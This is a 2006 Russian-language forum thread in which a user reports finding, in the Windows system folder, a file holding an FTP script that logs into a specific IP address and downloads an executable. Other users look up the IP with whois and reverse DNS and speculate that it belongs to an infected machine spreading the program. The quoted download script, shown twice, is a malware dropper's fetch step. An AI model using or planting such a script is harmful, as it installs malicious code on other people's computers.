Страница 1 из 1
Такой наглости я не ожидал
Добавлено: 18 апр 2006, 20:27
eprst
Заглянул случайно в C:\WINNT\SYSTEM32 и нашел там файл такого содержания :
open 70.71.98.150 17725
user 1 1
get setup_38601.exe
quit
(AdAware и AVG не нашли)
Такой наглости я не ожидал чтобы IP address так смело указывать.
Это что начинающие хакеры? Адрес - статический (вроде SHAW)?
Re: Такой наглости я не ожидал
Добавлено: 18 апр 2006, 21:14
CdR
прелесть.
whois:
OrgAbuseHandle: SHAWA-ARIN
OrgAbuseName: SHAW ABUSE
OrgAbusePhone: +1-403-750-7420
OrgAbuseEmail:
internet.abuse@sjrb.ca
$ host 70.71.98.150
]150.98.71.70.in-addr.arpa domain name pointer S010600105a5badb1.vs.shawcable.net.
Re: Такой наглости я не ожидал
Добавлено: 19 апр 2006, 06:12
Stanislav
eprst писал(а):Заглянул случайно в C:\WINNT\SYSTEM32 и нашел там файл такого содержания :
open 70.71.98.150 17725
user 1 1
get setup_38601.exe
quit
(AdAware и AVG не нашли)
Такой наглости я не ожидал чтобы IP address так смело указывать.
Это что начинающие хакеры? Адрес - статический (вроде SHAW)?
А чем они рискуют? Докажите, что это они его туда прописали! Они скажут - это нас хакеры-хрюкеры подставляют!
Добавлено: 19 апр 2006, 12:30
sz
> это нас хакеры-хрюкеры подставляют!
Что характерно, скорее всего, так и есть.
Думаю, setup_38601.exe умеет узнать ip и распостранить себя с него
